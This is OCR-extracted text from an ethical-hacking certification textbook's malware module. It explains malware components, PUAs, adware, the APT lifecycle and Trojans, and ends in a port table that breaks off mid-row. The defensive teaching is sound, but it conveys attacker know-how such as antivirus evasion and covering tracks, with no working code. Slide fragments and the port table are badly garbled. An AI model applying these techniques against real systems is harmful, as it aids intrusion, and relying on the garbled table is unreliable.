Rich Text Format (RTF) Injection: RTF injection involves exploiting features of Microsoft Office such as RTF template files that are stored locally or in a remote machine. RTF templates are used for specifying the document format. Attackers inject malicious macros into RTF files and host them on their servers. When a user opens the document, the malicious template is automatically retrieved from the remote server by evading security systems.
Module 07 Page 954
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Components of Malware
CE H
@ The components of a malware software depend on the requirements of the malware author who designsit for a specific target to perform intended tasks
Cues
are Dropper Exploit aoe ae a Payload Malicious Code
Software that protects malware from undergoing reverse engineering or analysis, thus making the task of the security mechanism harder in its detection
type of Trojan that downloads other malware from the Internet on to the PC. Usually, attackers install downloader software when they first gain access to a system A type of Trojan that covertly installs other malware files on to the system ‘A malicious code that breaches the system security via software vulnerabilities to access information or install malware {A program that injects its code into other vulnerable running processes and changes how they execute to hide or prevent its removal ‘A program that conceals its code and intended purpose via various techniques, and thus, makes it hard for security mechanisms to detect or remove it {A program that allows all files to bundle together into a single executable file via compression to bypass security software detection A piece of software that allows control over a computer system after it has been exploited A command that defines malware’s basic functionalities such as stealing data and creating backdoors
Components of Malware Malware authors and attackers create malware using components that can help them achieve their goals. They can use malware to steal information, delete data, change system settings, provide access, or merely multiply and occupy space. Malware is capable of propagating and functioning secretly. Some essential components of most malware programs are as follows: =
Crypter: It is a software program that can conceal the existence of malware. Attackers use this software to elude antivirus detection. It protects malware from reverse engineering or analysis, thus making it difficult to detect by security mechanisms.
=
Downloader: It is a type of Trojan that downloads other malware (or) malicious code and files from the Internet to a PC or device. Usually, attackers install a downloader when they first gain access to a system.
=
Dropper: It is a covert carrier of malware. Attackers embed notorious malware files inside droppers, which can perform the installation task covertly. Attackers need to first install the malware program or code on the system to execute the dropper. The dropper can transport malware code and execute malware on a target system without being detected by antivirus scanners.
=
Exploit: It is the part the malware that contains code or a sequence of commands that can take advantage of a bug or vulnerability in a digital system or device. Attackers use such code to breach the system’s security through software vulnerabilities to spy on information or to install malware. Based on the type of vulnerabilities abused, exploits are categorized into local exploits and remote exploits.
Module 07 Page 955 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Malware Threats
Exam 312-50 Certified Ethical Hacker
=
Injector: This program injects exploits or malicious code available in the malware into other vulnerable running processes and changes the method of execution to hide or prevent its removal.
=
Obfuscator: It is a program that conceals the malicious code of malware via various techniques, thus making it difficult for security mechanisms to detect or remove it.
=
Packer: This software compresses the malware file to convert the code and data of the malware into an unreadable format. It uses compression techniques to pack the malware.
=
Payload: It is the part of the malware that performs the desired activity when activated. It may be used for deleting or modifying files, degrading the system performance, opening ports, changing settings, etc., to compromise system security.
=
Malicious Code: This is a piece of code that defines the basic functionality malware and comprises commands that result in security breaches.
of the
It can take the following forms: o
Java Applets
o
ActiveX Controls
o.
Browser Plug-ins
o
Pushed Content
Module 07 Page 956
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Potentially Unwanted Application or Applications (PUAs)
CE H
@ Also knownas graywareor junkware, are potentially harmful applications that may pose severe risks to the security and privacyof data stored in the system where they are installed @ Installed when downloading and installing freeware usinga third-party installer or when acceptinga misleading license Covertly monitor and alter the data or settingsin the system, similarly to other malware
© Torrent @
;
Marketing
© Cryptomining @
as malware or a
potentially unwanted
application (PUA)
Dialers
I ORERD
_ © Adware
7 engines detected tis fle
COCO
Types of PUAs
Potentially Unwanted Application: Torrent — © Microsoft and other antimalware products have classified wTorrent, a popular BitTorrent client,
Co
@
agreement
Potentially Unwanted Application or Applications (PUAs) Potentially unwanted applications or programs (PUAs or PUPs, respectively), also known as grayware/junkware, are potentially harmful applications that may pose severe risks to the security and privacy of data stored in the system where they are installed. Most PUAs originate from sources such as legitimate software packages and even malicious applications used for illegal activities. PUAs can degrade system performance and compromise privacy and data security. Most PUAs get installed when downloading and installing freeware using a third-party installer or when accepting a misleading license agreement. PUAs can covertly monitor and alter the data or settings in the system, similarly to other malware. Types of PUAs =
Adware: These PUAs display unsolicited advertisements offering free sales and pop-ups of online services when browsing websites. They may disturb normal activities and lure victims into clicking on malicious URLs. They may also issue bogus reminders regarding
outdated software or OS. =
Torrent: When using torrent applications for downloading large files, the user may be compelled to download unwanted programs that have features of peer-to-peer file sharing.
=
Marketing: Marketing PUAs monitor the online activities performed by users and send browser details and information regarding personal interests to third-party app owners. These applications then market products and resources based on users’ personal interests.
=
Cryptomining: Cryptomining PUAs make use of the victims’ personal assets and financial data on the system and perform the digital mining of cryptocurrencies such as bitcoins.
Module 07 Page 957 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
=
Dialers: Dialers or spyware dialers are programs that get installed and configured in a system automatically to call a set of contacts at several locations without the user’s consent. Dialers cause massive telephone bills and are sometimes very difficult to locate and delete.
Potentially Unwanted Application: pTorrent
Source: https://www.myce.com Microsoft and other antimalware products have classified Torrent, a popular BitTorrent client, as malware or a potentially unwanted application (PUA). Consequently, the installation of uTorrent is blocked on many computers. Microsoft even lists wTorrent in its malware encyclopedia as PUA:Win32/Utorrent, with the description, “This application was stopped from running on your network because it has a poor reputation. This application can also affect the quality of your computing experience.”
E;
7 engines detected this file
EXE
C:]
:
(7/65 )
ae
CAT-Quicen
aw
orweb
A
ESET-NOD32
a
K7AntiVirus
A
a «Sun ) ° o —§ @
Microsoft Ad-Aware Anniabvs ata. vast ave
A ° ° ° o ry
K7GW Trendiicro Housecall AegsLab Avec avcabit Avast Mable Securty
1
Figure 7.1: Screenshot showing PUAs detected and blocked
Module 07 Page 958
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Adware
CE H
‘©
Asoftware or a program that supports advertisements and generates unsolicited ads and pop-ups
‘@
Tracks the cookies and user browsing patterns for marketing purposes and collects user data
‘@
Consumes additional bandwidth, and exhausts CPU resources and memory
Indications of Adware
Frequent system lag Inundated advertisements Incessant system crash
Disparity in the default browser homepage Presence of new toolbar or browser add-ons Slow Internet
Adware Adware refers to software or a program that supports advertisements and generates unsolicited ads and pop-ups. It tracks cookies and user browsing patterns for marketing purposes and to display advertisements. It collects user data such as visited websites to customize advertisements for the user. Legitimate software can be embedded with adware to generate revenue, in which case the adware is considered a legitimate alternative provided to customers who do not wish to pay for the software. In some cases, legitimate software may be embedded with adware by an attacker or a third party to generate revenue. Software containing legitimate adware typically provides the option to disable ads by purchasing a registration key. Software developers utilize adware as a means to reduce development costs and increase profits. Adware enables them to offer software for free or at reduced prices, motivating them to design, maintain, and upgrade their software products. Adware typically requires an Internet connection to run. Common adware programs include toolbars on a user’s desktop or those that work in conjunction with the user’s web browser. Adware may perform advanced searches on the web or a user’s hard drive and may provide features to improve the organization of bookmarks and shortcuts. Advanced adware may also include games and utilities that are free to use but display advertisements while the programs launch. For example, users may be required to wait until an ad is completed before watching a YouTube video. While adware can be beneficial by offering an alternative to paid software, attackers can misuse adware to exploit users. When legitimate adware is uninstalled, the ads should stop. Further, legitimate adware requests a user for permission before collecting user data. However, when user data are collected without the user’s permission, the adware is malicious. Such adware is termed spyware and can affect the user’s privacy and security. Malicious adware is Module 07 Page 959 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Malware Threats
Exam 312-50 Certified Ethical Hacker
installed on a computer via cookies, plug-ins, file sharing, freeware, and shareware. It consumes additional bandwidth and exhausts CPU resources and memory. Attackers perform spyware attacks and collect information from the target user’s hard drive about visited websites or keystrokes in order to misuse the information and conduct fraud. Indications of Adware Frequent system lag: If the system takes longer than usual to respond, it may have adware infection. Adware also affects the processor speed and consumes memory, degrading performance. Inundated advertisements: The user is flooded with unsolicited advertisements and pop-ups in the user interface while browsing. Occasionally, the advertisements can be very challenging to close, paving way to malicious redirections. Incessant system crash: The user’s system may crash or freeze constantly, occasionally displaying the blue screen of death (BSoD). Disparity in the default browser homepage: The default browser homepage unexpectedly and redirects to malicious pages that contain malware.
changes
Presence of new toolbar or browser add-ons: The installation of a new toolbar or browser add-on without the user’s consent is an indication of adware. Slow Internet: Adware may cause the Internet connection to slow down even in normal usage by downloading huge advertisements and unwanted items in the background.
Module 07 Page 960
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
CEH
LO#02: Summarize Advanced Persistent Threat (APT) Concepts
Copyright © by
Al RightsReserved, Reproduction
i Strictly Prohibited.
APT Concepts Advanced persistent threats are a major security concern for any organization, as they represent threats to the organization’s assets, resources, financial records, and other confidential data. APT attacks can damage the reputation of an organization by revealing sensitive data. This section discusses APTs as well as their characteristics and lifecycle.
Module 07 Page 961
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
What are Advanced Persistent Threats?
CE H
|@ Advanced persistent threats (APTs) are defined as a type of network attack, where an attacker gains unauthorized access to a target network and remains undetected for a long period of time |@ The main objective behind these attacks is to obtain sensitive information rather than sabotaging the organization and its network Information Obtained during APT attacks
a= Ea
© Classified documents
© Transaction information
© User credentials
© Credit card information
@ Personalinformation about
@ Organization’s business strategy
© Network information
© Control system access information
employees or customers
bod ©
information
What are Advanced Persistent Threats? An advanced persistent threat is defined as a type of network attack whereby an attacker gains unauthorized access to a target network and remains in the network without being detected for a long time. The word “advanced” signifies the use of techniques to exploit the underlying vulnerabilities in the system. The word “persistent” signifies the external command-and-control (C&C) system that continuously extracts the data and monitors the victim’s network. The word “threat” signifies human involvement in coordination. APT attacks are highly sophisticated attacks whereby an attacker uses well-crafted malicious code along with a combination of multiple zero-day exploits to gain access to the target network. These attacks involve wellplanned and coordinated techniques whereby attackers erase evidence of their malicious activities after their objectives have been fulfilled. APT attacks are usually performed on organizations possessing valuable information, such as financial, healthcare, defense and aerospace, manufacturing, and business organizations. The main objective of these attacks is to obtain sensitive information rather than sabotaging the organization and its network. Information obtained by an attacker through APT attacks includes: =
Classified documents
=
Transaction information
=
User credentials
=
Credit card information
=
Employee’s or customer’s personal information
=
Organization’s business strategy information
=
Network information
=
Control system access information
Module 07 Page 962
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Characteristics of Advanced Persistent Threats
|
Objectives
| Obtaining sensitive information or fulfilling political or strategic goals
Timeliness
| Timeintaini taken by the attacker from assessing the target system for vulnerabilities to gaining and
Resources
| Amount of knowledge, tools, and techniques required to perform an attack
|
maintaining the access
Risk Tolerance
|
Skills and
|
Methods
Actions
CE H
_Level up to which the attack remains undetected in the target’s network Methods and tools used by the attackers to perform a certain attack
| APT consists ofa certain numberof technical “actions” that causes them to diferfromother cyberattacks
| oriAtg tack soaks | Numerous attemp tsto gaini entry into the target’s : network
Characteristics of Advanced Persistent Threats (Cont’d)
|
Numbers Involved in the Attecke
| Numberof host systems that are involved in the attack
Knowledge Source
| _ Gathering information through online sources about specific threats
Multi phasea
CE H
| APT attacks are multiphased which include reconnaissance, gaining access, discovery, capture, and data exfiltration
Tailored to the Vulnerabilities
|
Multiple Points of Entry
| The adversary creates multiple points of entry through the serverto maintain access to the target network
Evading Signature-Based Detection Systems
| APT attacks can easily bypass the security mechanisms such as firewall, antivirus software, 1DS/IPS, and email spam filter
Specific Warning Signs
|
fi vulnerabilities “it present in, the victim’s ictim’ network apts target-specific
Specific indications of an APT attack include inexplicable user account activities, presence
| ofp cxdoors, unusualfile transfersand file uploads, unusual database activity, etc.
Characteristics of Advanced Persistent Threats APTs have various characteristics based on which attackers can design and plan their activities to successfully launch an attack.
Module 07 Page 963 :
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
According to security researchers Sean Bodmer, Dr. Max Carpenter, some key characteristics of APTs are as follows:
Kilger,
Jade
Jones,
and
Gregory
Objectives The main objective of any APT attack is to repeatedly obtain sensitive information by gaining access to the organization’s network for illegal earnings. Another objective of an APT may be spying for political or strategic goals. Timeliness It refers to the time taken by an attacker from assessing the target system vulnerabilities to exploiting them to gain and maintain access to the target system.
for
Resources
It is defined as the amount of knowledge, tools, and techniques required to perform an attack. APT attacks are more sophisticated attacks performed by highly skilled cybercriminals, and they require considerable resources. Risk Tolerance It is defined as the level up to which the attack remains undetected in the target network. APT attacks are well planned and executed with proper knowledge of the target network, which helps them remain undetected in the network for a long time. Skills and Methods These are the methods and tools used methods used for performing the attack gather information about the target, mechanisms, and techniques to maintain
by attackers to perform a certain attack. The include various social engineering techniques to techniques to prevent detection by security access for a long time.
Actions
APT attacks follow a certain number of technical “actions” that make them different from other types of cyber-attacks. The main objective of such attacks is to maintain their presence in the victim’s network for a long time and extract as much data as possible. Attack Origination Points They refer to the numerous attempts made to gain entry into the target network. Such points of entry can be used to gain access to the network and launch further attacks. To succeed in gaining initial access, the attacker needs to conduct exhaustive research to identify the vulnerabilities and gatekeeper functions in the target network. Numbers Involved in the Attack It is defined as the number of host systems involved in the attack. APT attacks are usually performed by a crime group or crime organization. Knowledge Source It is defined as the gathering of information through online sources threats, which can be further exploited to perform certain attacks. Module 07 Page 964
about
specific
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Malware Threats
=
Exam 312-50 Certified Ethical Hacker
Multi-phased One of the important characteristics of APTs is that they follow multiple phases to execute an attack. The phases followed by an APT attack are reconnaissance, access, discovery, capture, and data exfiltration.
=
Tailored to the Vulnerabilities The malicious code used to execute APT attacks is designed and written such that it targets the specific vulnerabilities present in the victim’s network.
=
Multiple Points of Entries Once an adversary enters the target network, he/she establishes a connection with the server to download malicious code for further attacks. In the initial phase of an APT attack, the adversary creates multiple points of entry through the server to maintain access to the target network. If one point of entry is discovered and patched by the security analyst, then the adversary can use a different entry point.
=
Evading Signature-Based Detection Systems APT attacks are closely related to zero-day exploits, which contain malware that has never been previously discovered or deployed. Thus, APT attacks can easily bypass security mechanisms such as firewalls, antivirus software, IDS/IPS, and email spam filters.
=
Specific Warning Signs APT attacks are usually impossible to detect. However, some indications of an attack include inexplicable user account activities, the presence of a backdoor Trojan for maintaining access to the network, unusual file transfers and file uploads, unusual database activities, etc.
Module 07 Page 965 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Advanced Persistent Threat Lifecycle
CE H
Cleanup ©
Cover tracks
@
Remain undetected
= 6
Search and Exfiltration
© Exfiltration data
1
5 APT
© Test for detection
Lifecycle Persistence ©
4
Maintain access
Preparation e Define target © Research target © Organize team e Build or attain tools
2 3
Initial Intrusion
© Deployment of malware @
Establishment of outbound
connection
Expansion © Expand access © Obtain credentials Copyright © by
Advanced Persistent Threat Lifecycle In the current threat landscape, organizations need to pay greater attention to APTs. APTs may target an organization’s IT assets, financial assets, intellectual property, and reputation. Commonly used security and defensive controls will not suffice to prevent such attacks. Attackers behind such attacks adapt their TTPs based on the vulnerabilities and security posture of the target organization. Thus, they can evade the security controls of the target organization. To launch an APT attack, attackers follow a certain set of phases to target, penetrate, and exploit an organization’s network. Attackers must follow each phase step by step to successfully
compromise and gain access to the target system.
The various phases of the APT lifecycle are as follows: 1.
Preparation
The first phase of the APT lifecycle is preparation, where an adversary defines the target, performs extensive research on the target, organizes a team, builds or attains tools, and performs tests for detection. APT attacks usually require a high level of preparation, as the adversary cannot risk detection by the target’s network security. Additional resources and data may be necessary before carrying out the attack. An attacker needs to perform highly complex operations before executing the attack plan against the target organization. 2.
Initial Intrusion The next phase involves attempting to enter the target network. Common techniques used for an initial intrusion are sending spear-phishing emails and exploiting vulnerabilities on publicly available servers. Spear-phishing emails usually appear
Module 07 Page 966
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Malware Threats
Exam 312-50 Certified Ethical Hacker
legitimate but they contain malicious links or attachments containing executable malware. These malicious links can redirect the target to the website where the target’s web browser and software are compromised by the attacker using various exploit techniques. Sometimes, an attacker may also use social engineering techniques to gather information from the target. After obtaining information from the target, attackers use such information to launch further attacks on the target network. In this phase, malicious code or malware is deployed into the target system to initiate an outbound connection. 3.
Expansion
The primary objectives of this phase are expanding access to the target network and obtaining credentials. If the attacker's aim is to exploit and gain access to a single system, then there is no need for expansion. However, in most cases, the objective of an attacker is to access multiple systems using a single compromised system. In this scenario, the first step performed by an attacker after an initial compromise is to expand access to the target systems. The main objective of the attacker in this phase is to obtain administrative login credentials to escalate privileges and to gain further access to the systems in the network. For this purpose, the attacker tries to obtain administrative privileges for the initial target system from cached credentials and uses these credentials to gain and maintain access to other systems in the network. When attackers are unable to obtain valid credentials, they use other techniques such as social engineering, exploiting vulnerabilities, and distributing infected USB devices. After the attacker obtains the target’s account credentials, it is difficult to track his/her movement in the network, as he/she uses a legitimate username and password. This expansion phase supports other phases of the APT lifecycle. In the search and exfiltration phase, the attacker can obtain the target data by gaining access to the systems. Attackers identify systems that can be used for installing persistence mechanisms and identify appropriate systems in the network that can be leveraged to exfiltrate data. 4.
Persistence
This phase involves maintaining access to the target system, starting from evading endpoint security devices such as IDS and firewalls, entering into the network, and establishing access to the system, until there is no further use of the data and assets. To maintain access to the target system, attackers follow certain techniques or procedures, which include use of customized malware and repackaging tools. These tools are designed such that they cannot be detected by the antivirus software or security tools of the target. To maintain persistence, attackers use customized malware that includes services, executables, and drivers installed on various systems in the target network. Another way to maintain persistence is finding locations for installing the malware that are not frequently examined. These locations include routers, servers, firewalls, printers, etc.
Module 07 Page 967 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
5.
Search and Exfiltration In this phase, an attacker achieves the ultimate goal of network exploitation, which is generally to gain access to a resource that can be used for performing further attacks or using that resource for financial gain. In general, attackers target specific data or documents before launching an attack. However, in some cases, although attackers determine that crucial data are available in the target network, they are unaware of the location of the data. A common method for search and exfiltration is to steal all the data including important documents, emails, shared drives, and other types of data present on the target network. Data can also be gathered using automated tools such as network sniffers. Attackers use encryption techniques to evade data loss prevention (DLP) technologies in the target network.
6.
Cleanup This is the last phase, where an attacker performs certain actions to prevent detection and remove evidence of compromise. Techniques used by the attacker to cover his/her tracks include evading detection, eliminating evidence of intrusion, and hiding the target of the attack and attacker details. In some cases, these techniques also include manipulating the data in the target environment to mislead security analysts. It is imperative for attackers to make the system appear as it was before they gained access to it and compromised the network. Therefore, it is essential for an attacker to cover his/her tracks and remain undetected by security analysts. Attackers can change any file attributes back to their original state. Information listed, such as file size and date, is just attribute information contained in the file.
Cleanup ©
Cover tracks
@
Remain undetected
\,
Search and Exfiltration ©
Exfiltration data
Preparation
6 5
1 APT
®
Define
© © ©
Research target Organize team Build or attain tools
target
eine teres
© Test for detection
Lifecycle
Persistence © Maintain access
4
2 3
Initial Intrusion © ©
Deployment of malware Establishment of outbound connection
Expansion
© Expand access ©
Obtain credentials
Figure 7.2: Advanced Persistent Threat Lifecycle
Module 07 Page 968
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
CEH
LO#03: Explain Trojans, Their Types, and How They Infect Systems
Copyright © by
Al RightsReserved, Reproduction
i Strictly Prohibited.
Trojan Concepts In this section, we will discuss the basic concepts backdoors as well as their impact on network Trojans and highlights their purpose, symptoms, various methods adopted by attackers to install malicious activities.
of Trojans to understand various Trojans and and system resources. This section describes and common ports used. It also discusses the Trojans to infect target systems and perform
This section also describes various types of Trojans. Every day, attackers discover or create new Trojans designed to discover vulnerabilities of target systems. Trojans are categorized by the way they enter systems and the types of actions they perform on these systems.
Module 07 Page 969 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
What is a Trojan? e
CE H
Itis a programin which the malicious or harmful code is contained inside an apparently harmless program or data, which can later gain control and cause damage Trojans get activated when a user performs certain predefined actions Indications of a Trojan attack include abnormal system and network activities such as disablingof antivirus and redirection to unknown pages
Trojans create a covert communication channel between the victim computer and the attacker for transferring sensitive data
&
Attacker propagates Trojan
ye Malicious Files
Internet Victim infected with Trojan Copyright © by
What is a Trojan? According to ancient Greek mythology, the Greeks won the Trojan War with the aid of a giant
wooden horse that was built to hide their soldiers. The Greeks left this horse in front of the
gates of Troy. The Trojans thought that the horse was a gift from the Greeks, which they had left before apparently withdrawing from the war and brought it into their city. At night, the
Greek soldiers broke out of the wooden horse and opened the city gates to let in the rest of the Greek army, who eventually destroyed the city of Troy. Inspired by this story, a computer Trojan is a program in which malicious or harmful code is contained inside an apparently harmless program or data, which can later gain control and cause damage, such as ruining the file allocation table on your hard disk. Attackers use computer Trojans to trick the victim into performing a predefined action. Trojans are activated upon users’ specific predefined actions such as unintentionally installing a malicious software, clicking on a malicious link, etc., and upon activation, they can grant attackers unrestricted access to all the data stored on the compromised information system and potentially cause severe damage. For example, users could download a file that appears to be a movie, but, when executed, unleashes a dangerous program that erases the hard drive or sends credit card numbers and passwords to the attacker. A Trojan is wrapped within or attached to a legitimate program, meaning that the program may have functionality that is not apparent to the user. Furthermore, attackers use victims as unwitting intermediaries to attack others. They can use a victim’s computer to commit illegal DoS attacks. Trojans work at the same level of privileges as the victims. For example, if a victim has privileges to delete files, transmit information, modify existing files, and install other programs (such as programs that provide unauthorized network access and execute privilege elevation attacks), Module 07 Page 970
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
once the Trojan infects that system, it will possess the same privileges. Furthermore, it can attempt to exploit vulnerabilities to increase the level of access even beyond the user running it. If successful, the Trojan can use such increased privileges to install other malicious code on the victim’s machine. A compromised system can affect other systems on the network. Systems that transmit authentication credentials such as passwords over shared networks in clear text or a trivially encrypted form are particularly vulnerable. If an intruder compromises a system on such a network, he or she may be able to record usernames and passwords or other sensitive information. Additionally, a Trojan, depending on the actions it performs, may falsely implicate a remote system as the source of an attack by spoofing, thereby causing the remote system to incur a liability. Trojans enter the system by means such as email attachments, downloads, and instant
messages.
Attacker
Internet
Downloads Malicious Files
propagates Trojan
Victim infected with Trojan
Malicious Files Figure 7.3: Depiction of a Trojan attack
Indications of Trojan Attack The following computer malfunctions are indications of a Trojan attack:
=
The DVD-ROM drawer opens and closes automatically.
=
The computer screen displayed backward.
=
The default background or wallpaper settings change automatically. This can performed using pictures either on the user’s computer or in the attacker’s program.
=
Printers automatically start printing documents.
=
Web pages suddenly open without input from the user.
=
The color settings of the operating system (OS) change automatically.
=
Screensavers convert to a personal scrolling message.
=
The sound volume suddenly fluctuates.
=
Antivirus programs are automatically disabled, and the data are corrupted, altered, or deleted from the system.
=
The date and time of the computer change.
Module 07 Page 971 :
blinks, flips upside-down,
or is inverted
so that everything
is be
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
T T T =
he mouse cursor moves by itself. he left- and right-click functions of the mouse are interchanged. he mouse pointer disappears completely.
The mouse pointer automatically clicks on icons and is uncontrollable.
T
he Windows Start button disappears.
Pp op-ups with bizarre messages suddenly appear. Clipboard images and text appear to be manipulated.
T
he keyboard and mouse freeze.
=
Contacts receive emails from a user’s email address that the user did not send.
=
Strange warnings or question boxes appear. Often, these are personal messages directed at the user, asking questions that require him/her to answer by clicking a Yes, No, or OK button.
=
The system turns off and restarts in unusual ways.
=
The taskbar disappears automatically.
=
The Task Manager is disabled. The attacker or Trojan may disable the Task Manager function so that the victim cannot view the task list or end the task on a given program
or process.
Send me credit card details
Here is my credit card number and expire date
Send me Facebook account information
Here is my Facebook login and profile
Victim infected with Trojan
Victim infected
with Trojan
Victim infected
Here is my bank ATM and pincode
Trojan with ith Troj
Figure 7.4: Diagram showing how the attacker extracts information from the victim system
Module 07 Page 972
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
How Hackers Use Trojans
CE H
| | Delete or replace critical operating system files
Disable firewalls and antivirus
| 2 | Generate fake trafficto create DoS attacks
Create backdoors to gain remote access
3 | Record screenshots, audio, and video of
Infect victim's PC as a proxy server for relaying
4 | Use victim's PC for spamming and blasting email messages
Use the victim's PC as a botnet to perform
rs | Download spyware, adware, and malicious
Steal personal information such as passwords, security codes, and credit card information
victim’s PC
attacks
DDoS attacks
files
How Hackers Use Trojans Attackers create malicious programs such as Trojans for the following purposes: Delete or replace OS’s critical files Generate fake traffic to perform DoS attacks
Record screenshots, audio, and video of victim’s PC Use victim’s PC for spamming and blasting email messages Download spyware, adware, and malicious files Disable firewalls and antivirus Create backdoors to gain remote access Infect the victim’s PC as a proxy server for relaying attacks Use the victim’s PC as a botnet to perform DDoS attacks Steal sensitive information such as: o
Credit
card
information,
which
is useful
for
domain
registration
as
well
as for
shopping using keyloggers o
Account data passwords
such
as
email
passwords,
dial-up
passwords,
and
web
o
Important company projects, including presentations and work-related papers
service
Encrypt the victim’s machine and prevent the victim from accessing the machine
Module 07 Page 973
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
=
Use the target system as follows: o
To store archives of illegal materials, such as child pornography. The target continues using his/her system without realizing that attackers are using it for illegal activities
o
AsanFTP server for pirated software
=
Script kiddies may just want to have fun with the target system; an attacker could plant a Trojan in the system just to make the system act strangely (e.g., the CD\DVD tray opens and closes frequently, the mouse functions improperly, etc.)
=
The attacker might use target would be held authorities
a compromised system for other illegal purposes such that the responsible if these illegal activities are discovered by the
Common Ports used by Trojans Ports represent the entry and exit points of data traffic. There are two types of ports: hardware ports and software ports. Ports within the OS are software ports, and they are usually entry and exit points for application traffic (e.g., port 25 is associated with SMTP for e-mail routing between mail servers). Many existing ports are application-specific or process-specific. Various Trojans use some of these ports to infect target systems. Users need a basic understanding of the state of an "active connection” and ports commonly used by Trojans to determine whether a system has been compromised. Among the various states, the “listening” state is the important one in this context. The system generates this state when it listens for a port number while waiting to connect to another system. Whenever a system reboots, Trojans move to the listening state; some use more than one port: one for "listening" and the other(s) for data transfer. Common ports used by different Trojans are listed in the table below. Port 2
20/22/80/ 443 21/3024/
4092/5742
Trojan Death
Emotet WinCrash
intras
Port 5001/50505 |
5321 5400-02
Trojan Sockets de Troie
FireHotcker Blade Runner/Blade
Runner 0.80 Alpha
Blade Runner, Doly Trojan, Fore, 21
Invisible FTP, WebEx, WinCrash,
5569
Robo-Hack
DarkFTP 22
Shaft, SSH RAT, Linux Rabbit
6267
GW Girl
23
Tiny Telnet Server, EliteWrap
6400
Thing
Module 07 Page 974
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Port
Trojan
Port
Trojan
6666
KilerRat, Houdini RAT
Antigen, Email Password Sender, Terminator, WinPC, WinSpy, Haebu
25
Coceda, Shtrilitz Stealth, Terminator,
Kuang2 0.17A-0.30, Jesrto, Lazarus
Group, Mis-Type, Night Dragon 26 31/456
BadPatch
6667/12349 |
Hackers Paradise
6670-71
Bionet, Magic Hound
DeepThroat
Denis, Ebury, FIN7, Lazarus Group,
53 68
RedLeaves, Threat Group-3390, Tropic
6969
GateCrasher, Priority
Mspy
7000
Remote Grab
Trooper
Necurs, NetWire, Ismdoor, Poison Ivy, Executer, Codered, APT 18, APT 19, APT 32, BBSRAT, Calisto, Carbanak, Carbon,
80
Comnie, Empire, FIN7, InvisiMole,
Lazarus Group, MirageFox, Mis-Type, Misdat, Mivast, MoonWind,
Dragon, POWERSTATS,
Shiver
139 421
NetMonitor
Night
RedLeaves, S-
Type, Threat Group-3390,
113
7300-08
UBoatRAT
7300/31338
731339
| Net Spy
Nuker, Dragonfly 2.0
7597
Qaz
TCP Wrappers Trojan
7626
Gdoor
7777
GodMsg
7789
ICKiller
ADVSTORESHELL , APT 29, APT 3, APT 33, AuditCred, BADCALL, BBSRAT, Bisonal, Briba, Carbanak, Cardinal RAT, Comnie, Derusbi, ELMER, Empire,
443
FELIXROOT, FIN7, FIN8 , ghOst RAT, HARDRAIN, Hi-Zor, HOPLIGHT, KEYMARBLE, Lazarus Group, LOWBALL, Mis-Type, Misdat, MoonWind,
Naid,
Nidiran, Pasam, PlugX, PowerDuke,
POWERTON,
Proxysvc, RATANKBA,
